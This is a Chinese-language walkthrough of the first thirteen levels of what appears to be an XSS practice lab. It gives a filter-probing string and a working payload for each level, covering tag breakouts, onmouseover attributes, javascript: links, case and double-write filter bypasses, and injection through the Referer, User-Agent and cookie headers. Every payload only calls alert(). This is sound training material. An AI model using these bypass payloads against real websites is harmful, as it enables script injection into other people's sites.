好小子!开始我们的XSS挑战之旅吧!
超级无敌xss代码
<sCr<ScRiPt>IPT>OonN'"\/ (hrHRefEF)</sCr</ScRiPt>IPT>
可以使用hackbar,也可以直接在URL的name上输入超级无敌代码,进行观察过滤了哪些字母或字符。可以使用下面两种方法观察
- 查看源代码(Ctrl+F4)
- 查看文档目录树(F12)
level1:
点开图片发现,直接欢迎用户test1,
- 按F12,打开backbar
使用超级无敌代码进行观察
<sCr<ScRiPt>IPT>OonN'"\/ (hrHRefEF)</sCr</ScRiPt>IPT>
可以看到,代码并没有被过滤掉
输入
<script>alert(/xss/)</script>
点击确认,下一关
level2:
使用超级无敌xss代码
<sCr<ScRiPt>IPT>OonN'"\/ (hrHRefEF)</sCr</ScRiPt>IPT>
闭合标签,输入以下xss代码
"><script>alert(/xss/)</script>
level3:
超级无敌的xss代码代码走起
<sCr<ScRiPt>IPT>OonN'"\/ (hrHRefEF)</sCr</ScRiPt>IPT>
-
可以看到,“<” 被转换成了 比较操作符。换个思路,构造响应事件进行注入
’onmouseover='alert(/xss/)'#发现多了一个单引号,无法闭合 'onmouseover='alert(/xss/)#写完后,没有反应,需要将鼠标移到代码框。即可过关。onmouseover就是鼠标移动响应事件
level4:
很好,继续加油!超级无敌xss代码,走起
<sCr<ScRiPt>IPT>OonN'"\/ (hrHRefEF)</sCr</ScRiPt>IPT>
继续使用onmouseover,鼠标响应事件
’onmouseover='alert(/xss/)'#观察发现,是双引号。修改成双引号 "onmouseover="alert(/xss/)
将鼠标划到搜索框进行鼠标移动响应事件
level5:
xss超级代码走起
<sCr<ScRiPt>IPT>OonN'"\/ (hrHRefEF)</sCr</ScRiPt>IPT>
script和on都有下划线,href和“<"没有被过滤,使用伪协议
"><a href='javascript:alert(/xss/)'>click me!</a>#点我
level6:
使用超级无敌xss代码
<sCr<ScRiPt>IPT>OonN'"\/ (hrHRefEF)</sCr</ScRiPt>IPT>
观察得出大小写没有被过滤,可以试试新思路。就决定是你了,大小写
"><scRscript>alert(/xss/)</ScRipt>
level7:
宇宙超级无敌xss实验代码,走起
<sCr<ScRiPt>IPT>OonN'"\/ (hrHRefEF)</sCr</ScRiPt>IPT>
on、script、<、都被过滤。非常好!可以使用大小写加双写了
"><ScRscriptiPt>alert(/xss/)</ScscriptRiPt>
level8:
每次都要来一次,超级无敌宇宙第一xss代码,走起!
<sCr<ScRiPt>IPT>OonN'"\/ (hrHRefEF)</sCr</ScRiPt>IPT>
发现实验的代码只有href能用,但是在下面的红框中,表示href有下划线,且代码书写在友情连接里,代码写完后,点击友情连接进行跳转。使用伪协议,进行ASCII编码
level9:
宇宙无敌超级xss代码走起
<sCr<ScRiPt>IPT>OonN'"\/ (hrHRefEF)</sCr</ScRiPt>IPT>
竟然显示不合法
-
- 使用http://www.baidu.com看看会出现什么
-
哦豁,竟然合法,猜测是不是需要加“http://”
javascript:alert('http://')
level10:
最强宇宙无敌xss代码走起
<sCr<ScRiPt>IPT>OonN'"\/ (hrHRefEF)</sCr</ScRiPt>IPT>
没有找到。发现下面有三个t_link、t_history、t_sort。在hackbar里面给这三个进行赋值
t_sort="onmouseover="alert(/xss/)" #发现只有t_sort能够插入
但是type的属性是hidden,进行修改。完整代码
t_sort="onmouseover="alert(/xss/)" type="text"
level11:
太阳系最强xss代码
<sCr<ScRiPt>IPT>OonN'"\/ (hrHRefEF)</sCr</ScRiPt>IPT>
和第十关一样,根据经验,这个t_ref,应该是Referer。使用hackbar,勾选Referer,在Referer框里填写一下代码
"onmouseover="alert(/xss/)" type="text"
level12:
最强宇宙代码,走起
<sCr<ScRiPt>IPT>OonN'"\/ (hrHRefEF)</sCr</ScRiPt>IPT>
-
t_ua应该是User-Agent,使用hackbar,注入以下鼠标响应事件
"onmouseover="alert(/xss/)" type="text"
level13:
宇宙最强xss代码,走起
<sCr<ScRiPt>IPT>OonN'"\/ (hrHRefEF)</sCr</ScRiPt>IPT>
t_cook 应该是cookie值,使用hackbar,注入以下代码
t_cook="onmouseover="alert(/xss/)" type="text"
-
level14:
- 未完待续…
`